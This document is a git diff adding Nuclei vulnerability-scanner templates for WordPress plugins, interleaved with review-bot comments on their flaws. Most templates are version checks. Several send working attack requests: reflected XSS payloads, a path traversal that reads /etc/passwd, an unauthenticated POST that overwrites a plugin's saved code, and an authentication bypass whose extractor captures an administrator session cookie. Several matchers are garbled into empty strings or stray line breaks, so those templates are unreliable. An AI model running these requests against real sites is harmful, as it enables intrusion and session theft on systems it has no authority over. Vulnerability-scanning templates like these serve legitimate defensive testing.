./poc/web/wp-gotowebinar-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/web/wp-gotowebinar-plugin.yaml
./poc/web/wp-gotowebinar.yaml
+./poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
./poc/web/wp-webauthn-71441abab831c852cabdfcf51b578c3f.yaml
./poc/web/wp-webauthn-f28b000296f06a779e749742a94d7bfb.yaml
./poc/web/wp-webauthn.yaml
@@ -135008,6 +135248,8 @@
./poc/wordpress/formzu-wp-de3eef28bc5bff1cda8149a94e46b8a8.yaml
./poc/wordpress/formzu-wp.yaml
./poc/wordpress/forumwp-347948842ffe543c41596a9aa3dda87d.yaml
+./poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml
+./poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml
./poc/wordpress/forumwp.yaml
./poc/wordpress/fotawp-d622eb8bcbd4b333fcc853cc76fee77e.yaml
./poc/wordpress/fotawp.yaml
@@ -135927,6 +136169,7 @@
./poc/wordpress/smart-manager-for-wp-e-commerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/smart-manager-for-wp-e-commerce-plugin.yaml
./poc/wordpress/smart-manager-for-wp-e-commerce.yaml
+./poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml
./poc/wordpress/smart-marketing-for-wp-ced803621ea0311a639aa79ba95d0a04.yaml
./poc/wordpress/smart-marketing-for-wp.yaml
./poc/wordpress/smartmag-responsive-retina-wordpress-magazine-cbf2c0f2049aa1f11e685ad27e85256f.yaml
@@ -136018,6 +136261,7 @@
./poc/wordpress/thinkit-wp-contact-form-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/thinkit-wp-contact-form-plugin.yaml
./poc/wordpress/thinkit-wp-contact-form.yaml
+./poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml
./poc/wordpress/threewp-email-reflector-2b712155339ba6bb233ef4ca5805963a.yaml
./poc/wordpress/threewp-email-reflector.yaml
./poc/wordpress/transposh-translation-filter-for-wordpress-062cf6128cd71496bc9f9e8e75b9e3cb.yaml
@@ -136083,6 +136327,7 @@
./poc/wordpress/verbalize-wp.yaml
./poc/wordpress/verweise-wordpress-twitter-2964744389fb5f1e33539ac6baa901dc.yaml
./poc/wordpress/verweise-wordpress-twitter.yaml
+./poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml
./poc/wordpress/videojs-html5-video-player-for-wordpress-4eb103ae150e63f14ea0465bbdd222cb.yaml
./poc/wordpress/videojs-html5-video-player-for-wordpress.yaml
./poc/wordpress/viewpoint-system-status-11016.yaml
@@ -138542,6 +138787,7 @@
./poc/wordpress/wp-filemanager.yaml
./poc/wordpress/wp-film-studio-49f13dc6fa66760ca1ff6d5f40c3291d.yaml
./poc/wordpress/wp-film-studio.yaml
+./poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml
./poc/wordpress/wp-finder-xss-11445.yaml
./poc/wordpress/wp-finder-xss-11446.yaml
./poc/wordpress/wp-finder-xss-11447.yaml
@@ -138834,6 +139080,7 @@
./poc/wordpress/wp-hide-post.yaml
./poc/wordpress/wp-hide-security-enhancer-2a382d113b431bc3ea90b522ea6c775c.yaml
./poc/wordpress/wp-hide-security-enhancer-949cf036734f52d817c99198957fcd58.yaml
+./poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml
./poc/wordpress/wp-hide-security-enhancer-a29eacb2489023acacd8d32ef00c49c5.yaml
./poc/wordpress/wp-hide-security-enhancer-c06d2ba4b1ea598192f9d0e4403a1daa.yaml
./poc/wordpress/wp-hide-security-enhancer-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -139414,6 +139661,7 @@
./poc/wordpress/wp-marketing-automations.yaml
./poc/wordpress/wp-masquerade-6946da31a080f78d4bab5bc4d9e08e98.yaml
./poc/wordpress/wp-masquerade.yaml
+./poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml
./poc/wordpress/wp-matrix-gallery-45ba464412c6ae4b94e80349ccf8b660.yaml
./poc/wordpress/wp-matrix-gallery.yaml
./poc/wordpress/wp-maximum-upload-file-size-04759a9a8f073cb18fdeda9c67898ae7.yaml
@@ -139432,6 +139680,7 @@
./poc/wordpress/wp-media-library-categories-903b1f7c933a9d3f4b81cfe33b593514.yaml
./poc/wordpress/wp-media-library-categories-c4833aaf804a0c4e273407342064eef1.yaml
./poc/wordpress/wp-media-library-categories.yaml
+./poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
./poc/wordpress/wp-media-player-e7ce5b48a56bb28689a18116ede2e190.yaml
./poc/wordpress/wp-media-player.yaml
./poc/wordpress/wp-mega-theme.yaml
@@ -139485,6 +139734,7 @@
./poc/wordpress/wp-menu-cart-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-menu-cart-plugin.yaml
./poc/wordpress/wp-menu-cart.yaml
+./poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml
./poc/wordpress/wp-meta-and-date-remover-118904e8c976288b76d3619b8921ce5a.yaml
./poc/wordpress/wp-meta-and-date-remover-53a7dace1872d520f46fdcead285d0c8.yaml
./poc/wordpress/wp-meta-and-date-remover-6477bf18cad6c823db485408d49b337b.yaml
@@ -140053,6 +140303,7 @@
./poc/wordpress/wp-private-content-plus-225071e9ae085e01c69279c06acaae17.yaml
./poc/wordpress/wp-private-content-plus-345ac121f0293964f02d11db3261fea4.yaml
./poc/wordpress/wp-private-content-plus-73e3bc277a504f719dff9b56c8fe1187.yaml
+./poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml
./poc/wordpress/wp-private-content-plus-8399cc72e60881a40af3ce56aada6cb9.yaml
./poc/wordpress/wp-private-content-plus-c291ca39b147b2ed889e3d6401deefb3.yaml
./poc/wordpress/wp-private-content-plus-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -141010,6 +141261,7 @@
./poc/wordpress/wp-symposium.yaml
./poc/wordpress/wp-syntax-5fa1471b8621ae57e90a0948fa90499f.yaml
./poc/wordpress/wp-syntax.yaml
+./poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml
./poc/wordpress/wp-t-wap-9502e7aea17c6e5cf70e43ae94018124.yaml
./poc/wordpress/wp-t-wap.yaml
./poc/wordpress/wp-table-6bfac4f1efb2b97f1bd23e30846a82a5.yaml
diff --git a/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml b/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
new file mode 100644
index 0000000000..7f0398197f
--- /dev/null
+++ b/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
@@ -0,0 +1,59 @@
+id: capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db
+
+info:
+ name: >
+ Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/capitalize-my-title/"
+ google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,capitalize-my-title,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "capitalize-my-title"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.3')
\ No newline at end of file
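Review bot: The only vulnerability evidence in this template is the `Stable tag` string in `readme.txt`, compared in the `dsl` matcher with `compare_versions(version, '<= 0.5.3')`, so a hit means a readme advertising that version is reachable, not that the stored-XSS path exists on the site. A readme whose tag is `trunk` never matches `([0-9.]+)`, and the word `capitalize-my-title` (word matchers are case-sensitive by default) may be absent from a readme that only carries the display name; both cases produce a silent false negative. The `info` block also ships an empty `description`, null `cvss-metrics`/`cvss-score`/`cve-id` next to a `cve` tag, and the placeholder `shodan-query: 'vuln:'`. I would fill or drop these and add a comment such as `# version-only check: confirms the advertised readme version, not exploitability`. The same generated layout repeats in the cookielay, mycred, otp-login (rated `critical`) and third-party-cookie-eraser templates below.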
diff --git a/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml b/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
new file mode 100644
index 0000000000..07ba85af05
--- /dev/null
+++ b/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
@@ -0,0 +1,59 @@
+id: cookielay-d1709b11e04e7ac0020e84fff5516e5a
+
+info:
+ name: >
+ Cookielay <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via cookielay Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cookielay/"
+ google-query: inurl:"/wp-content/plugins/cookielay/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cookielay,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cookielay/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cookielay"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml b/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
new file mode 100644
index 0000000000..d97cca740d
--- /dev/null
+++ b/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
@@ -0,0 +1,59 @@
+id: mycred-b69b74183494c4b8dbaaa94b47c77a89
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
diff --git a/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml b/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
new file mode 100644
index 0000000000..e8b9f808c0
--- /dev/null
+++ b/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
@@ -0,0 +1,59 @@
+id: otp-login-59e25716cd4187f6ae0041590ffc4112
+
+info:
+ name: >
+ Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/otp-login/"
+ google-query: inurl:"/wp-content/plugins/otp-login/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,otp-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "otp-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml b/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml
new file mode 100644
index 0000000000..675b060fc7
--- /dev/null
+++ b/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml
@@ -0,0 +1,59 @@
+id: third-party-cookie-eraser-a95c341c56a938945d517c311512eb15
+
+info:
+ name: >
+ Third Party Cookie Eraser <= 1.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ded8f958-ed2a-43ab-8688-9f6d16515469?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/third-party-cookie-eraser/"
+ google-query: inurl:"/wp-content/plugins/third-party-cookie-eraser/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,third-party-cookie-eraser,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/third-party-cookie-eraser/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "third-party-cookie-eraser"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2011-4926-2089.yaml b/poc/cve/CVE-2011-4926-2089.yaml
new file mode 100644
index 0000000000..fb9c699a3f
--- /dev/null
+++ b/poc/cve/CVE-2011-4926-2089.yaml
@@ -0,0 +1,35 @@
+id: CVE-2011-4926
+info:
+ name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4926
+ - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
+ - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
+ - http://www.openwall.com/lists/oss-security/2012/01/10/9
+ classification:
+ cve-id: CVE-2011-4926
+ metadata:
+ google-query: inurl:"/wp-content/plugins/adminimize/"
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
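Review bot: The body matcher's only word is the empty string (`- ""` under `part: body`), which presumably matches every response, so with `matchers-condition: and` the template fires on any `200` reply carrying a `text/html` header whether or not the `page` parameter is reflected. The original marker looks to have been stripped somewhere along the way; the matcher should require the decoded payload from the request path to appear unescaped in the body, e.g. `- '</script><script>alert(document.domain)</script>'`. The same empty body word appears in CVE-2011-5181, CVE-2016-1000135, CVE-2018-3810, CVE-2021-24298, CVE-2021-24316 and CVE-2021-24510 in this commit, and in CVE-2021-24226 the body word is reduced to a line break.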
diff --git a/poc/cve/CVE-2011-5181-2118.yaml b/poc/cve/CVE-2011-5181-2118.yaml
new file mode 100644
index 0000000000..fb324d6a7d
--- /dev/null
+++ b/poc/cve/CVE-2011-5181-2118.yaml
@@ -0,0 +1,25 @@
+id: CVE-2011-5181
+info:
+ name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2016-1000135-2681.yaml b/poc/cve/CVE-2016-1000135-2681.yaml
new file mode 100644
index 0000000000..002bf598be
--- /dev/null
+++ b/poc/cve/CVE-2016-1000135-2681.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000135
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=533
+ - https://wordpress.org/plugins/hdw-tube
+ - http://www.securityfocus.com/bid/93820
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000135
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2018-16283-3362.yaml b/poc/cve/CVE-2018-16283-3362.yaml
new file mode 100644
index 0000000000..4c485ff4b7
--- /dev/null
+++ b/poc/cve/CVE-2018-16283-3362.yaml
@@ -0,0 +1,31 @@
+id: CVE-2018-16283
+
+info:
+ name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
+ author: 0x240x23elu
+ severity: critical
+ description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/45438
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
+ - https://github.com/springjk/wordpress-wechat-broadcast/issues/14
+ - http://seclists.org/fulldisclosure/2018/Sep/32
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-16283
+ cwe-id: CWE-22
+ tags: cve,cve2018,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+# Enhanced by mp on 2022/04/26
diff --git a/poc/cve/CVE-2018-3810-3557.yaml b/poc/cve/CVE-2018-3810-3557.yaml
new file mode 100644
index 0000000000..a09e1612c4
--- /dev/null
+++ b/poc/cve/CVE-2018-3810-3557.yaml
@@ -0,0 +1,43 @@
+id: CVE-2018-3810
+
+info:
+ name: WordPress Smart Google Code Inserter Authentication Bypass
+ author: princechaddha
+ severity: critical
+ reference: https://www.exploit-db.com/exploits/43420
+
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2018-3810
+ cwe-id: CWE-287
+ description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code."
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
+
+ body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode'
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
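Review bot: The first request is a `POST` with `action=savegooglecode` to `options-general.php?page=smartcode`, which writes to the plugin's stored settings on every target scanned, yet the `info` block has no `tags` line, so the template cannot be excluded from routine scans by tag. I would add `tags: cve,cve2018,wordpress,wp-plugin,intrusive` (assuming the project follows the usual `intrusive` convention) and a comment above the request such as `# state-changing: overwrites the plugin's saved code fields; restore them after the scan`. As shown, `sgcgoogleanalytic=` is sent empty, so the request would also blank any value already configured. CVE-2022-1609(1).yaml in this commit runs a command on the target through `system('{{cmd}}')`, and its `tags` likewise carry no such marker.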
diff --git a/poc/cve/CVE-2020-8771-5339.yaml b/poc/cve/CVE-2020-8771-5339.yaml
new file mode 100644
index 0000000000..9c85185f0d
--- /dev/null
+++ b/poc/cve/CVE-2020-8771-5339.yaml
@@ -0,0 +1,55 @@
+id: CVE-2020-8771
+
+info:
+ name: WordPress WP Time Capsule Authentication Bypass
+ author: princechaddha
+ severity: critical
+ reference: https://github.com/SECFORCE/WPTimeCapsulePOC
+
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-8771
+ cwe-id: CWE-287
+ description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts."
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ IWP_JSON_PREFIX
+
+ - |
+ GET /wp-admin/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
'
+ - "
Dashboard
"
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - 'text/html'
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: header
+ regex:
+ - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
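Review bot: The `extractors` regex `wordpress_[a-z0-9]+=([A-Za-z0-9%]+)` on `part: header` copies the session cookie issued after the bypass into the scan results. Per the description that session belongs to the first administrator account, so every report, log and ticket that stores the output then holds a usable credential. The matchers already prove the finding, so I would drop the extractor or capture only the cookie name with `- "wordpress_[a-z0-9]+="`. If the value has to stay, a comment such as `# extracted value is a live admin session cookie; treat scan output as a secret` should say so. The `info` block also has no `tags` line.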
diff --git a/poc/cve/CVE-2021-24226-5648.yaml b/poc/cve/CVE-2021-24226-5648.yaml
new file mode 100644
index 0000000000..2548bcc24e
--- /dev/null
+++ b/poc/cve/CVE-2021-24226-5648.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-24226
+
+info:
+ name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage
+ author: dhiyaneshDK
+ severity: high
+ description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required.
+ reference:
+ - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24226
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-24226
+ cwe-id: CWE-200
+ tags: wordpress,cve,cve2021,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/poc/cve/CVE-2021-24298-5686.yaml b/poc/cve/CVE-2021-24298-5686.yaml
new file mode 100644
index 0000000000..21462431a1
--- /dev/null
+++ b/poc/cve/CVE-2021-24298-5686.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-24298
+
+info:
+ name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
+ tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24298
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2021-24316-5695.yaml b/poc/cve/CVE-2021-24316-5695.yaml
new file mode 100644
index 0000000000..00b724d223
--- /dev/null
+++ b/poc/cve/CVE-2021-24316-5695.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-24316
+
+info:
+ author: 0x_Akoko
+ description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+ name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+ severity: medium
+ tags: cve,cve2021,mediumish,xss,wordpress
+ reference: |
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "Sorry, no posts matched your criteria."
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
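Review bot: `reference: |` turns the two URLs into one literal block string that still contains the leading `- ` markers, whereas most other templates in this commit give `reference` as a list; dropping the `|` so that `reference:` is followed directly by the two `- https://…` items restores the list. The request path also ends in a space inside the quotes (`…%3C/script%3E '`), which is probably unintended and may be sent or trimmed depending on the client, so I would remove it.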
